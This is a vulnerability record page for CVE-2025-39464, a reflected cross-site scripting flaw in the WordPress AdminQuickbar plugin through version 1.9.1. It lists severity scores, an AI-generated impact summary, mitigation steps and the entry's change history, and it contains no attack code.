Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar adminquickbar allows Reflected XSS.This issue affects AdminQuickbar: from n/a through <= 1.9.1.
Published: 2025-04-17
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The AdminQuickbar plugin for WordPress contains a vulnerability that fails to neutralize user‑controlled input, allowing malicious scripts to be reflected into page markup. This reflected Cross‑Site Scripting (XSS) flaw, identified as CWE‑79, can execute arbitrary code in the browser context of any user who views a page that incorporates the plugin, potentially leading to session hijacking, defacement, or redirect to malicious sites.

Affected Systems

WordPress sites running the rtowebsites AdminQuickbar plugin version 1.9.1 or earlier are vulnerable. All releases through 1.9.1 lack the necessary input sanitization and should be considered at risk until a later version is deployed.

Risk and Exploitability

The CVSS score of 7.1 reflects moderate‑to‑high risk, while the EPSS score of less than 1% indicates a very low current likelihood of exploitation. The vulnerability is not listed in CISA’s KEV catalog. Based on the description, it is inferred that an attacker can craft a URL containing malicious input that is reflected in the plugin’s output, requiring the victim to click or otherwise load the URL from the affected admin area; the attack is therefore likely to be targeted rather than widespread.

Generated by OpenCVE AI on May 2, 2026 at 02:09 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade AdminQuickbar to the most recent release, which includes the fix for the reflected XSS vulnerability.
  • If an upgrade is not immediately possible, disable the plugin or restrict its usage to parts of the site that are not accessible to the public.
  • Implement a web application firewall rule or enforce a Content Security Policy that blocks execution of user‑supplied scripts to mitigate any remaining injection risk.

Generated by OpenCVE AI on May 2, 2026 at 02:09 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-11787 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar adminquickbar allows Reflected XSS.This issue affects AdminQuickbar: from n/a through <= 1.9.1.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Thu, 17 Apr 2025 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 17 Apr 2025 15:30:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rtowebsites AdminQuickbar allows Reflected XSS. This issue affects AdminQuickbar: from n/a through 1.9.1.
Title WordPress AdminQuickbar plugin <= 1.9.1 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:32.031Z

Reserved: 2025-04-16T06:23:36.340Z

Link: CVE-2025-39464

cve-icon Vulnrichment

Updated: 2025-04-17T18:10:28.559Z

cve-icon NVD

Status : Deferred

Published: 2025-04-17T16:15:56.103

Modified: 2026-04-23T15:29:36.560

Link: CVE-2025-39464

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-02T02:15:31Z

Weaknesses